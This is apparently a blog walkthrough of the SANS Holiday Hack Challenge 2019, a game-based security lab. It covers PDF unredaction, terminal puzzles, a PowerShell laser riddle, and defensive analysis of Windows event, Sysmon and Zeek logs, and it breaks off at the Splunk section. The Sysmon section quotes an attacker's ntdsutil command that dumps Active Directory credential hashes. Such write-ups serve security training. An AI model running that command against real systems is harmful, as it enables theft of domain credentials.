SANS Holiday Hack Challenge 2019 | FLRNKS

Talk to Santa in the Quad

Sat, 28 Dec 2019 00:00:00 +0100

Greetings from Santa

This is the very beginning of your journey at the Elf University. Your just arrived to the North Pole by train and your starting position looks something like the below:

You can interact with the characters by clicking on them (repeatedly clicking will reveal their full message), and you can also interact with certain objects that will either open some command line terminal or a full website in a frame. If you click on Santa a few times he provide the below greeting:

Welcome to the North Pole and KringleCon 2! Last year, KringleCon hosted over 17,500 attendees and my castle got a little crowded. We moved the event to Elf University (Elf U for short), the North Pole’s largest venue. Please feel free to explore, watch talks, and enjoy the con!

As you can notice, you are not alone at the North Pole. One of the coolest things of the challenge is that you get to interact with like-minded people through the game interface. Whenever you feel lost, you should ask in the chat for some guidance. Just be sure not to ask for direct solutions, because that would ruin all the fun, wouldn’t it? :)

Another great feature is the personal badge on your avatar, which you can click at any point and will provide useful information on your objectives and accomplishments.

Get outta here

In this zeroth(?!) objective you need to find Santa in another room called The Quad so your main job is to find the way out of the Train Station. Navigation works either via mouse-clicks or via the arrow keys on your keyboard. To go to The Quad simply start going upwards until you find yourself in another space.

Once you found Santa, who is quite hard to miss, as he stands right in the middle of The Quad, you can click on him a few times to complete Objective 0 and receive further instructions:

This is a little embarrassing, but I need your help. Our KringleCon turtle dove mascots are missing! They probably just wandered off. Can you please help find them? To help you search for them and get acquainted with KringleCon, I’ve created some objectives for you. You can see them in your > badge. Where’s your badge? Oh! It’s that big, circle emblem on your chest - give it a tap! We made them in two flavors - one for our new guests, and one for those who’ve attended both KringleCons. After you find the Turtle Doves and complete objectives 2-5, please come back and let me know. Not sure where to start? Try hopping around campus and talking to some elves. If you help my elves with some quicker problems, they’ll probably remember clues for the objectives.

Find the Turtle Doves

Sat, 28 Dec 2019 00:00:00 +0100

Where the doves at?

After talking with Santa in The Quad you get your new objective: Find the Turtle Doves. They are the official mascot of this year’s challenge, and you need to find them before it’s too late!

To be sure, there is not much else to do, except go around and explore until you find them. Once you do find them, be sure to click on the text over their head to make your objective complete! Hint: they are warming up somewhere near a fireplace… :)

You get some valuable further clues one you find them and click them a few times:

Hoot Hooot? … Hoot Hooot? … Hoot Hooot? … Hoot Hooot?

But jokes aside, at this point you should be familiar with the inner functioning of the challenge universe at the North Pole. Now you are ready to start working on the real stuff.

Unredact Threatening Document

Sat, 28 Dec 2019 00:00:00 +0100

Un-redact that thing!

The instructions from the badge:

Someone sent a threatening letter to Elf University. What is the first word in ALL CAPS in the subject line of the letter? Please find the letter in the Quad.

Much like finding the Turtle Doves, there is not much else to do but to explore the environment with careful attention to details, such as documents lying around … until you find it:

When you click the piece of paper in the corner, you will be redirected to an URL which loads a PDF document with some redacted parts.

https://downloads.elfu.org/LetterToElfUPersonnel.pdf

In order to read the redacted part, simply hit Ctrl+A or use the mouse to select all text, and copy paste it into some empty text editor, to reveal the full, un-redacted contents.

Date: February 28, 2019
To the Administration, Faculty, and Staff of Elf University
17 Christmas Tree Lane
North Pole
From: A Concerned and Aggrieved Character
Subject: DEMAND: Spread Holiday Cheer to Other Holidays and Mythical Characters… OR
ELSE!
Attention All Elf University Personnel,
It remains a constant source of frustration that Elf University and the entire operation at the
North Pole focuses exclusively on Mr. S. Claus and his year-end holiday spree. We URGE
you to consider lending your considerable resources and expertise in providing merriment,
cheer, toys, candy, and much more to other holidays year-round, as well as to other mythical
characters.
For centuries, we have expressed our frustration at your lack of willingness to spread your
cheer beyond the inaptly-called “Holiday Season.” There are many other perfectly fine
holidays and mythical characters that need your direct support year-round.
If you do not accede to our demands, we will be forced to take matters into our own hands.
We do not make this threat lightly. You have less than six months to act demonstrably.
Sincerely,
--A Concerned and Aggrieved Character
Confidential

Now you can submit the string DEMAND in the input field on your personal badge so solve the objective.

Windows Log Analysis - Evaluate Attack Outcome

Sat, 28 Dec 2019 00:00:00 +0100

Find the sprayer!

Instructions from the badge:

We’re seeing attacks against the Elf U domain! Using the event log data, identify the user account that the attacker compromised using a password spray attack. Bushy Evergreen is hanging out in the train station and may be able to help you out.

Link to Event logs: https://downloads.elfu.org/Security.evtx.zip (this file is binary, so a preview is not possible).

Technical Challenge

If you need further help before solving this objective, head down to the Train Station and talk with Bushy Evergreen. He will be glad to help you, as long as you help him out with an issue with his terminal:

Hi, I’m Bushy Evergreen. Welcome to Elf U! I’m glad you’re here. I’m the target of a terrible trick. Pepper Minstix is at it again, sticking me in a text editor. Pepper is forcing me to learn ed. Even the hint is ugly. Why can’t I just use Gedit? Please help me just quit the grinchy thing.

Click on the TERMINAL next to him, and solve the presented problem:

 ........................................
.;oooooooooooool;,,,,,,,,:loooooooooooooll:
.:oooooooooooooc;,,,,,,,,:ooooooooooooollooo:
.';;;;;;;;;;;;;;,''''''''';;;;;;;;;;;;;,;ooooo:
.''''''''''''''''''''''''''''''''''''''''';ooooo:
 ;oooooooooooool;''''''',:loooooooooooolc;',,;ooooo:
 .:oooooooooooooc;',,,,,,,:ooooooooooooolccoc,,,;ooooo:
.cooooooooooooo:,''''''',:ooooooooooooolcloooc,,,;ooooo,
coooooooooooooo,,,,,,,,,;ooooooooooooooloooooc,,,;ooo,
coooooooooooooo,,,,,,,,,;ooooooooooooooloooooc,,,;l'
coooooooooooooo,,,,,,,,,;ooooooooooooooloooooc,,..
coooooooooooooo,,,,,,,,,;ooooooooooooooloooooc.
coooooooooooooo,,,,,,,,,;ooooooooooooooloooo:.
coooooooooooooo,,,,,,,,,;ooooooooooooooloo;
:llllllllllllll,'''''''';llllllllllllllc,
Oh, many UNIX tools grow old, but this one's showing gray.
That Pepper LOLs and rolls her eyes, sends mocking looks my way.
I need to exit, run - get out! - and celebrate the yule.
Your challenge is to help this elf escape this blasted tool.
-Bushy Evergreen
Exit ed.
1100
q <<< type q to exit
Loading, please wait......
You did it! Congratulations!

Okay, it was a rather simple issue… However, it was good practice, as you will encountering similar technical challenges down the road. Once you go back and click on Bushy, you will finally get your hints for solving this challenge:

Wow, that was much easier than I’d thought. Maybe I don’t need a clunky GUI after all! Have you taken a look at the password spray attack artifacts? I’ll bet that DeepBlueCLI tool is helpful. You can check it out on GitHub. It was written by that Eric Conrad. He lives in Maine - not too far from here!

What he is essentially telling you is to use this tool, to solve Objective 3. For this purpose you will be most likely needing a windows-based machine (physical or virtual does not matter). You should first clone the given repository from GitHub, and then download the Security.evtx file provided in the Objective description. Then you should execute the DeepBlue.ps1 script with this file as its first argument. Be sure to start a new PowerShell session as ADMIN!

# command #1 set the execution policy unrestricted so we can call the DeepBlueCLI script
$ Set-ExecutionPolicy unrestricted
# command #2
$ .\DeepBlue.ps1 .\Security.evtx
...
Date : 2019. 08. 24. 2:00:20
Log : Security
EventID : 4672
Message : High number of logon failures for one account
Results : Username: supatree
Total logon failures: 76
...
Date : 2019. 08. 24. 2:00:20
Log : Security
EventID : 4672
Message : Multiple admin logons for one account
Results : Username: pminstix
User SID Access Count: 2

Full output can be seen in this PB document: https://pastebin.com/X5LBNVCy

After the DeepBlueCLI tool finished processing the file, it will produce a ton of output. Your task will be to find the account name and submit it through your personal badge, to see if it is the right solution. When I was trying to solve this challenge, I just scrolled until I found pminstix and supatree account names. I first tried the former, which did not work, and thentried to submit the latter, which did work, so objective #3 is now solved!

One could probably write a more sophisticated script to parse and search for same the answer, but simple ways can sometimes lead to quicker solutions… :)

Windows Log Analysis - Determine Attacker Technique

Sat, 28 Dec 2019 00:00:00 +0100

Un-redact that thing!

Instructions from the badge:

Using these normalized Sysmon logs, identify the tool the attacker used to retrieve domain password hashes from the lsass.exe process. For hints on achieving this objective, please visit Hermey Hall and talk with SugarPlum Mary.

Link to the SysMon logs and below you can see some sample data:

{
"command_line": "cmd.exe /c echo besewi > \\\\.\\pipe\\besewi",
"event_type": "process",
"logon_id": 999,
"parent_process_name": "services.exe",
"parent_process_path": "C:\\Windows\\System32\\services.exe",
"pid": 3812,
"ppid": 616,
"process_name": "cmd.exe",
"process_path": "C:\\Windows\\System32\\cmd.exe",
"subtype": "create",
"timestamp": 132186397959850000,
"unique_pid": "{7431d376-deb3-5dd3-0000-001096a84f00}",
"unique_ppid": "{7431d376-cd7f-5dd3-0000-001010910000}",
"user": "NT AUTHORITY\\SYSTEM",
"user_domain": "NT AUTHORITY",
"user_name": "SYSTEM"
}

Technical Challenge

To get some further hints for solving this challenge, you are told to talk with SugarPlum Mary in Hermey Hall. She is ready to give you some advice, as long as you help her first with an issue she is having with her terminal:

Oh me oh my - I need some help! I need to review some files in my Linux terminal, but I can’t get a file listing. I know the command is ls, but it’s really acting up. Do you think you could help me out? As you work on this, think about these questions:

Do the words in green have special significance?

How can I find a file with a specific name?

What happens if there are multiple executables with the same name in my $PATH?

When you click to view her terminal you get the following information:

K000K000K000KK0KKKKKXKKKXKKKXKXXXXXNXXXX0kOKKKK0KXKKKKKKK0KKK0KK0KK0KK0KK0KK0KKKKKK
00K000KK0KKKKKKKKKXKKKXKKXXXXXXXXNXXNNXXooNOXKKXKKXKKKXKKKKKKKKKK0KKKKK0KK0KK0KKKKK
KKKKKKKKKKKXKKXXKXXXXXXXXXXXXXNXNNNNNNK0x:xoxOXXXKKXXKXXKKXKKKKKKKKKKKKKKKKKKKKKKKK
K000KK00KKKKKKKKXXKKXXXXNXXXNXXNNXNNNNNWk.ddkkXXXXXKKXKKXKKXKKXKKXKKXK0KK0KK0KKKKKK
00KKKKKKKKKXKKXXKXXXXXNXXXNXXNNNNNNNNWXXk,ldkOKKKXXXXKXKKXKKXKKXKKKKKKKKKK0KK0KK0XK
KKKXKKKXXKXXXXXNXXXNXXNNXNNNNNNNNNXkddk0No,;;:oKNK0OkOKXXKXKKXKKKKKKKKKKKKK0KK0KKKX
0KK0KKKKKXKKKXXKXNXXXNXXNNXNNNNXxl;o0NNNo,,,;;;;KWWWN0dlk0XXKKXKKXKKXKKKKKKKKKKKKKK
KKKKKKKKXKXXXKXXXXXNXXNNXNNNN0o;;lKNNXXl,,,,,,,,cNNNNNNKc;oOXKKXKKXKKXKKXKKKKKKKKKK
XKKKXKXXXXXXNXXNNXNNNNNNNNN0l;,cONNXNXc',,,,,,,,,KXXXXXNNl,;oKXKKXKKKKKK0KKKKK0KKKX
KKKKKKXKKXXKKXNXXNNXNNNNNXl;,:OKXXXNXc''',,''''',KKKKKKXXK,,;:OXKKXKKXKKX0KK0KK0KKK
KKKKKKKKXKXXXXXNNXXNNNNW0:;,dXXXXXNK:'''''''''''cKKKKKKKXX;,,,;0XKKXKKXKKXKKK0KK0KK
XXKXXXXXXXXXXNNNNNNNNNN0;;;ONXXXXNO,''''''''''''x0KKKKKKXK,',,,cXXKKKKKKKKXKKK0KKKX
KKKKKKKXKKXXXXNNNNWNNNN:;:KNNXXXXO,'.'..'.''..':O00KKKKKXd'',,,,KKXKKXKKKKKKKKKKKKK
KKKKKXKKXXXXXXXXNNXNNNx;cXNXXXXKk,'''.''.''''.,xO00KKKKKO,'',,,,KK0XKKXKKK0KKKKKKKK
XXXXXXXXXKXXXXXXXNNNNNo;0NXXXKKO,'''''''.'.'.;dkOO0KKKK0;.'',,,,XXXKKK0KK0KKKKKKKKX
XKKXXKXXXXXXXXXXXNNNNNcoNNXXKKO,''''.'......:dxkOOO000k,..''',,lNXKXKKXKKK0KKKXKKKK
KXXKKXXXKXXKXXXXXXXNNNoONNXXX0;'''''''''..'lkkkkkkxxxd'...'''',0N0KKKKKXKKKKKK0XKKK
XXXXXKKXXKXXXXXXXXXXXXOONNNXXl,,;;,;;;;;;;d0K00Okddoc,,,,,,,,,xNNOXKKKKKXKKKKKKKXKK
XXXXXXXXXXXXXXXXXXXXXXXONNNXx;;;;;;;;;,,:xO0KK0Oxdoc,,,,,,,,,oNN0KXXKKXKKXKKKKKKKXK
XKXXKXXXXXXXXXXXXXXXXXXXXWNX:;;;;;;;;;,cO0KKKK0Okxl,,,,,,,,,oNNK0NXXXXXXXXXKKKKKKKX
XXXXXXXXXXXXXXXXXXXXXXXNNNWNc;;:;;;;;;xKXXXXXXKK0x,,,,,,,,,dXNK0NXXXXXXXXXXXKKXKKKK
XKXXXXXXXXXXXXXXXXXXXXNNWWNWd;:::;;;:0NNNNNNNNNXO;,,,,,,,:0NN0XNXNXXXXXXXXXXXKKXKKX
NXXXXXXXXXXXXXXXXXXXXXNNNNNNNl:::;;:KNNNNNNNNNNO;,,,,,,;xNNK0NXNXXNXXXXXXKXXKKKKXKK
XXNNXNNNXXXXXXXXXXXXXNNNNNNNNNkl:;;xWWNNNNNWWWk;;;;;;;xNNKKXNXNXXNXXXXXXXXXXXKXKKXK
XXXXXNNNNXNNNNXXXXXXNNNNNNNNNNNNKkolKNNNNNNNNx;;;;;lkNNXNNNNXXXNXXNXXXXXXXXXXXKKKKX
XXXXXXXXXXXNNNNNNNNNNNNNNNNNNNNNNNNNKXNNNNWNo:clxOXNNNNNNNNXNXXXXXXXXXXXXXXXKKXKKKK
XXXXNXXXNXXXNXXNNNNNWWWWWNNNNNNNNNNNNNNNNNWWNWWNWNNWNNNNNNNNXXXXXXNXXXXXXXXXXKKXKKX
XNXXXXNNXXNXXNNXNXNWWWWWWWWWNNNNNNNNNNNNNWWWWNNNNNNNNNNNNNNNNNNNNNXNXXXXNXXXXXXKXKK
XXXXNXXNNXXXNXXNXXNWWWNNNNNNNNNWWNNNNNNNNWWWWWWNWNNNNNNNNNNNNNNNXXNXNXXXXNXXXXKXKXK
I need to list files in my home/
To check on project logos
But what I see with ls there,
Are quotes from desert hobos...
which piece of my command does fail?
I surely cannot find it.
Make straight my path and locate that-
I'll praise your skill and sharp wit!
Get a listing (ls) of your current directory.

elf@b0b213fcf787:~$ ls
This isn't the ls you're looking for

elf@b0b213fcf787:~$ which ls
/usr/local/bin/ls

elf@b0b213fcf787:~$ /bin/ls << call the original ls directly to solve it
' ' rejected-elfu-logos.txt
Loading, please wait......
You did it! Congratulations!

A rather simple solution, but don’t worry, it will get a bit harder as you progress… Now, if you go back and click on Mary a few times, she will reveal the hints for solving this objective:

Oh there they are! Now I can delete them. Thanks! Have you tried the Sysmon and EQL challenge? If you aren’t familiar with Sysmon, Carlos Perez has some great info about it. Haven’t heard of the Event Query Language? Check out some of Ross Wolf’s work on EQL or that blog post by Josh Wright in your badge.

Link for EQL: https://www.endgame.com/our-experts/ross-wolf

Main Objective

While the provided hint about EQL was interesting, I could not directly use it to solve this challenge. Instead I went on a different route. Since the goal is to identify a tool being used to extract password hashes from lsass.exe, I parsed the JSON file with the Sysmon logs with jq and then filtered for the command_line looking for .exe files.

$ cat sysmon-data.json | jq '.[].command_line' | grep '.exe' | uniq | wc -l
196

196 is still rather large number to try, so then I decided to search on the net for extracting domain password and one of the first few articles pointed me to a utility called NTDS. I searched for this in the logs and the answer presented itself right away: ntdsutil which is the solution for Objective #4:

$ cat sysmon-data.json | jq '.[].command_line' | grep 'ntdsutil.exe'
"ntdsutil.exe \"ac i ntds\" ifm \"create full c:\\hive\" q q"

Network Log Analysis - Determine Compromised System

Sat, 28 Dec 2019 00:00:00 +0100

Zeek them logs!

Instructions from the badge:

The attacks don’t stop! Can you help identify the IP address of the malware-infected system using these Zeek logs? For hints on achieving this objective, please visit the Laboratory and talk with Sparkle Redberry.

Link to Zeek logs which weigh around 300 MB (1.4 GB uncompressed).

Technical Challenge

Before attacking the Zeek logs, you can look for Sparkle Redberry in the Laboratory for some hints on the main objective. But as usual, you need to help him first with a laser device that’s normally generating Xmas Cheers but is now malfunctioning:

I’m Sparkle Redberry and Imma chargin’ my laser! Problem is: the settings are off. Do you know any PowerShell? It’d be GREAT if you could hop in and recalibrate this thing. It spreads holiday cheer across the Earth … … when it’s working!

So now it’s time to dive into the PowerShell terminal sitting on the table, which controls the laser hardware. When you open the terminal you see the below banner:

PowerShell 6.2.3
Copyright (c) Microsoft Corporation. All rights reserved.
https://aka.ms/pscore6-docs
Type 'help' to get help.
🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲
🗲 🗲
🗲 Elf University Student Research Terminal - Christmas Cheer Laser Project 🗲
🗲 ------------------------------------------------------------------------------ 🗲
🗲 The research department at Elf University is currently working on a top-secret 🗲
🗲 Laser which shoots laser beams of Christmas cheer at a range of hundreds of 🗲
🗲 miles. The student research team was successfully able to tweak the laser to 🗲
🗲 JUST the right settings to achieve 5 Mega-Jollies per liter of laser output. 🗲
🗲 Unfortunately, someone broke into the research terminal, changed the laser 🗲
🗲 settings through the Web API and left a note behind at /home/callingcard.txt. 🗲
🗲 Read the calling card and follow the clues to find the correct laser Settings. 🗲
🗲 Apply these correct settings to the laser using it's Web API to achieve laser 🗲
🗲 output of 5 Mega-Jollies per liter. 🗲
🗲 🗲
🗲 Use (Invoke-WebRequest -Uri http://localhost:1225/).RawContent for more info. 🗲
🗲 🗲
🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲

You can see some really good hints straight away. Your main task is to calibrate the laser, so that it emits at least 5 Mega-Jollies of Xmas Cheer. In order to calibrate it we can change its angle, the temperature, the refraction and various compositions of gases inside. For the full instructions execute the command in the banner:

PS /home/elf> (Invoke-WebRequest -Uri http://localhost:1225/).RawContent
HTTP/1.0 200 OK
Server: Werkzeug/0.16.0
Server: Python/3.6.9
Date: Sat, 28 Dec 2019 21:20:38 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 860
...
----------------------------------------------------
Christmas Cheer Laser Project Web API
----------------------------------------------------
Turn the laser on/off:
GET http://localhost:1225/api/on
GET http://localhost:1225/api/off
Check the current Mega-Jollies of laser output
GET http://localhost:1225/api/output
Change the lense refraction value (1.0 - 2.0):
GET http://localhost:1225/api/refraction?val=1.0
Change laser temperature in degrees Celsius:
GET http://localhost:1225/api/temperature?val=-10
Change the mirror angle value (0 - 359):
GET http://localhost:1225/api/angle?val=45.1
Change gaseous elements mixture:
POST http://localhost:1225/api/gas
POST BODY EXAMPLE (gas mixture percentages):
O=5&H=5&He=5&N=5&Ne=20&Ar=10&Xe=10&F=20&Kr=10&Rn=10
----------------------------------------------------
...

When I first tried to calibrate the laser, I naively thought I can just enter some random numbers and see if I can reach the desired amount of Mega-Jollies by trial and error / brute forcing. But after 10 minutes of messing with the laser parameters, I had to admit that this was not going to work. So then I read the banner again and started following the hints.

PS /home/elf> get-content /home/callingcard.txt
What's become of your dear laser?
Fa la la la la, la la la la
Seems you can't now seem to raise her!
Fa la la la la, la la la la
Could commands hold riddles in hist'ry?
Fa la la la la, la la la la
Nay! You'll ever suffer myst'ry!
Fa la la la la, la la la la
PS /home/elf>

This clue is pointing to the command history, so next I Googled how to see PowerShell command history and queried the terminal:

PS /home/elf> Get-History
Id CommandLine
-- -----------
1 Get-Help -Name Get-Process
2 Get-Help -Name Get-*
3 Set-ExecutionPolicy Unrestricted
4 Get-Service | ConvertTo-HTML -Property Name, Status > C:\services.htm
5 Get-Service | Export-CSV c:\service.csv
6 Get-Service | Select-Object Name, Status | Export-CSV c:\service.csv
7 (Invoke-WebRequest http://127.0.0.1:1225/api/angle?val=65.5).RawContent
8 Get-EventLog -Log "Application"
9 I have many name=value variables that I share to applications system wide. At a comma…
10 (Invoke-WebRequest -Uri http://localhost:1225/).RawContent
11 get-content /home/callingcard.txt

IDs #7 and ID #9 both seems interesting. For now we can assume that ID #7 holds the correct value for the angle! I then continued with ID #9 which seemed to have a truncated message. If only we could reveal the full version. Of course, after few google searches, I found just the command I needed.

PS /home/elf> Invoke-History -Id 9
I have many name=value variables that I share to applications system wide. At a command I will reveal my secrets once you Get my Child Items.

So hidden in the riddle was another riddle. The first sentence seems to suggest we need to look at ENV variables, while the second sentence seems to suggest how to get to them. On to google searching again, then back to the terminal:

PS /home/elf> Get-ChildItem Env:
Name Value
---- -----
PWD /home/elf
riddle Squeezed and compressed I am hidden away. Expand me from my…
SHELL /home/elf/elf
... ...

Here we see an environment variable named riddle containing some further clues. However we need to find a way to expand it so its full content can be revealed. This can be done in numerous ways, one idea I got from my brother, who is a bigger PowerShell guru than I am, was to do the below:

PS /home/elf> (Get-ChildItem Env:)[-9].Value
Squeezed and compressed I am hidden away. Expand me from my prison and I will show you the way. Recurse through all /etc and Sort on my LastWriteTime to reveal i'm the newest of all.
PS /home/elf>

So the content of the riddle env variable was now revealed, which seemed to suggest to continue looking in the /etc folder, where we should find the file which was modified most recently. Back to Google again, to do some searching, which gave the below commands:

PS /home/elf> Get-ChildItem -Recurse -Path /etc | Sort LastWriteTime
[... lots of output omitted for brievity...]
Directory: /etc/apt
Mode LastWriteTime Length Name
---- ------------- ------ ----
--r--- 12/28/19 9:46 PM 5662902 archive
PS /home/elf> Expand-Archive /etc/apt/archive -DestinationPath ./expanded
PS /home/elf> Get-ChildItem ./expanded/
Directory: /home/elf/expanded
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/28/19 9:53 PM refraction
PS /home/elf> Get-ChildItem ./expanded/refraction/
Directory: /home/elf/expanded/refraction
Mode LastWriteTime Length Name
---- ------------- ------ ----
------ 11/7/19 11:57 AM 134 riddle << further clue for temperature
------ 11/5/19 2:26 PM 5724384 runme.elf << refraction is hidden here

This archive, when unpacked, revealed a folder named refraction and within another hint plus the value for refraction. To get the value for refraction I had to somehow run the other file runme.elf. I spent close to 2 hours trying to figure out how to call this file from PowerShell, when I had almost given up, and gave a final try by issuing chmod +x and then running it as binary executable. Quite surprisingly this worked like a charm:

PS /home/elf/expanded/refraction> chmod +x ./runme.elf
PS /home/elf/expanded/refraction> ./runme.elf
refraction?val=1.867
PS /home/elf/expanded/refraction> Get-Content ./riddle
Very shallow am I in the depths of your elf home. You can find my entity by using my md5 identity:
25520151A320B5B0D21561F92C8F6224
PS /home/elf/expanded/refraction>

So there was the correct setting for the refraction of the laser. Next I turned to the other file in the folder called riddle and saw further clues. I noticed that it referred to depths, which was a reference to the HOME directory which contained hundreds of text files in several levels of folders hierarchy. Somewhere in these depths was a file which had the md5 hash referenced in the riddle. To find it I issued the below command:

PS /home/elf> Get-ChildItem ./depths/*.txt -Recurse | Get-FileHash -Algorithm MD5 | Where-Object hash -eq 25520151A320B5B0D21561F92C8F6224 | Select path
Path
----
/home/elf/depths/produce/thhy5hll.txt
PS /home/elf> Get-Content /home/elf/depths/produce/thhy5hll.txt
temperature?val=-33.5
I am one of many thousand similar txt's contained within the deepest of /home/elf/depths. Finding me will give you the most strength but doing so will require Piping all the FullName's to Sort Length.

The last missing piece of the laser puzzle was the correct composition of gas compounds for the laser. There were no direct hints that I could find, however, I had the idea that perhaps the /home/elf/depths folder may be holding more than just the temperature. Next I did a search for the top 3 largest text files within this folder and found that the 2 largest text files are somewhat special. The largest was the one which contained the temperature, the second largest was another file with some further clues.

PS /home/elf> Get-ChildItem -Path ./depths/ -Recurse | Sort-Object Length -Descending | Select-Object length,name,directory -First 3 | Format-Table -AutoSize -Wrap
Length Name Directory
------ ---- ---------
224 thhy5hll.txt /home/elf/depths/produce
209 0jhj5xz6.txt /home/elf/depths/larger/cloud/behavior/beauty/enemy/produce/age/chair/u
nknown/escape/vote/long/writer/behind/ahead/thin/occasionally/explore/t
ape/wherever/practical/therefore/cool/plate/ice/play/truth/potatoes/bea
uty/fourth/careful/dawn/adult/either/burn/end/accurate/rubbed/cake/main
/she/threw/eager/trip/to/soon/think/fall/is/greatest/become/accident/la
bor/sail/dropped/fox
162 r9j67n1j.txt /home/elf/depths/larger/saddle/grown/correctly/allow/free/spoken/coffee
/sight/increase/steady/division/gas/available/pressure/wooden

As it can be seen, the 3rd largest file was noticeably smaller. I still checked its content, but there was nothing useful in it, so it was safe to assume that no other files were of any interest within the depths folder. So then I checked the contents of the 0jhj5xz6.txt buried deep within the depths and found that it contained some pretty useful hint:

PS /home/elf> Get-Content /home/elf/depths/larger/cloud/behavior/beauty/enemy/produce/age/chair/unknown/escape/vote/long/writer/behind/ahead/thin/occasionally/explore/tape/wherever/practical/therefore/cool/plate/ice/play/truth/potatoes/beauty/fourth/careful/dawn/adult/either/burn/end/accurate/rubbed/cake/main/she/threw/eager/trip/to/soon/think/fall/is/greatest/become/accident/labor/sail/dropped/fox/0jhj5xz6.txt
Get process information to include Username identification. Stop Process to show me you're skilled and in this order they must be killed:
 bushy
 alabaster
 minty
 holly
Do this for me and then you /shall/see.
PS /home/elf> Get-Process -IncludeUserName
 WS(M) CPU(s) Id UserName ProcessName
 ----- ------ -- -------- -----------
 28.99 2.01 6 root CheerLaserServi
 191.95 16.86 31 elf elf
 3.57 0.02 1 root init
 0.72 0.00 24 bushy sleep
 0.75 0.00 26 alabaster sleep
 0.77 0.00 28 minty sleep
 0.82 0.00 29 holly sleep
 3.27 0.00 30 root su
PS /home/elf> Stop-Process 24 26 28 29
PS /home/elf> Get-Content /shall/see
Get the .xml children of /etc - an event log to be found. Group all .Id's and the last thing will be in the Properties of the lonely unique event Id.
PS /home/elf>

So it seemed the gas values were hidden somewhere in an .xml file in the /etc folder. To find this file I turned to another command of PowerShell:

PS /home/elf> Get-ChildItem -Recurse -Include *.xml -Path /etc/
Directory: /etc/systemd/system/timers.target.wants
Mode LastWriteTime Length Name
---- ------------- ------ ----
--r--- 11/18/19 7:53 PM 10006962 EventLog.xml

It was a rather large XML file, so instead of displaying it, I just did a simple text-based search. I know the hint said I should parse the XML and do some fancy Group-By based on ID and whatnot, but I am fond of simpler shortcuts whenever possible, so I did a simple string search that quickly gave me the answer to the composition of gases:

PS /home/elf> Get-Content /etc/systemd/system/timers.target.wants/EventLog.xml | Select-String -pattern "gas"
<S N="Message">
Process Create: -
RuleName: -
UtcTime: 2019-11-07 17:59:56.525
ProcessGuid: {BA5C6BBB-5B9C-5DC4-0000-00107660A900}
ProcessId: 3664
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.14393.206 (rs1_release.160915-0644)
Description: Windows PowerShell Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "`$correct_gases_postbody = @{`n O=6`n H=7`n He=3`n N=4`n Ne=22`n Ar=11`n Xe=10`n F=20`n Kr=8`n Rn=9`n}`n"
CurrentDirectory: C:\
 User: ELFURESEARCH\allservices
LogonGuid: {BA5C6BBB-5B9C-5DC4-0000-0020F55CA900}
LogonId: 0xA95CF5
TerminalSessionId: 0
IntegrityLevel: High
Hashes: MD5=097CE5761C89434367598B34FE32893B
ParentProcessGuid: {BA5C6BBB-4C79-5DC4-0000-001029350100}
ParentProcessId: 1008
ParentImage: C:\Windows\System32\svchost.exe
ParentCommandLine: C:\Windows\system32\svchost.exe -k netsvcs</S>

I formatted the output a bit, but basically it is very easy to spot the composition of gases within the arguments of the PowerShell executable: O=6 H=7 He=3 N=4 Ne=22 Ar=11 Xe=10 F=20 Kr=8 Rn=9. With this final piece of the puzzle complete, I used the laser Web API to submit the correct values and reached the 5 Mega-Jollies of Xmas Cheer with the laser output.

(Invoke-WebRequest http://127.0.0.1:1225/api/off).RawContent
(Invoke-WebRequest http://127.0.0.1:1225/api/angle?val=65.5).RawContent
(Invoke-WebRequest http://127.0.0.1:1225/api/temperature?val=-33.5).RawContent
(Invoke-WebRequest http://127.0.0.1:1225/api/refraction?val=1.867).RawContent
(Invoke-WebRequest -Uri http://127.0.0.1:1225/api/gases -Body "O=6&H=7&He=3&N=4&Ne=22&Ar=11&Xe=10&F=20&Kr=8&Rn=9" -Method POST).RawContent
(Invoke-WebRequest http://127.0.0.1:1225/api/on).RawContent
(Invoke-WebRequest http://127.0.0.1:1225/api/output).RawContent

Now that this terminal issue is solved, let’s check with Sparkle Redberry for the hints he promised:

You got it - three cheers for cheer! For objective 5, have you taken a look at our Zeek logs? Something’s gone wrong. But I hear someone named Rita can help us. Can you and she figure out what happened?

Main Objective

So the hint from Sparkle mentioned Rita, which is not a reference to some other character on the ELFU campus, but a tool for solving the main objective. The tool is available through a GitHub repository.

As a next step I unpacked the 300 MB zip and noticed that it already contained a folder ELFU which had an index.html. I loaded it up in my browser and noticed that it contained statistics from presumably the same log files so I did not had to install Rita eventually. Instead I relied on the contents of this ELFU folder from the unpacked zip.

So next I opened the index.html and saw that one database with name ELFU was available. I clicked it and got a bunch of tabs with different kinds of information:

I first noticed the Beacons tab and the very first item in the table with 7660 connections and source IP of 192.168.134.130. Then I remembered that I was looking for the IP address of a system which is infected with malware. Then I also checked the Long Connections tab and the same source IP showed up with the longest connection of 1000 (probably seconds?). Then I tried my luck with this IP address as the answer and the value was accepted!

Splunk

Sat, 28 Dec 2019 00:00:00 +0100

Evil emails!

Instructions from the badge:

Access https://splunk.elfu.org/ as elf with password elfsocks. What was the message for Kent that the adversary embedded in this attack? The SOC folks at that link will help you along! For hints on achieving this objective, please visit the Laboratory in Hermey Hall and talk with Prof. Banas.

For additional advice you are told to visit Hermey Hall and talk to Prof Banas:

